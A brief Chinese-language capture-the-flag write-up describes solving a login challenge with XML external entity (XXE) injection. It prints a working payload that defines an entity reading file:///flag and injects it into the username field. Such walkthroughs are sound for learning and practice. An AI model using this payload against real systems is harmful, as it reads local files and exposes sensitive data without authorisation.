打开题目
猜测可能为sql注入,或者绕过,思路查看源码,看有用信息
试输入发现只会返回用户名错误,根据提示XML相对XXE攻击
首先进行抓包,然后构造payload。
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [<!ENTITY admin SYSTEM "file:///flag">]> <user><username>&admin;</username><password>123456</password></user>
直接就可以得到flag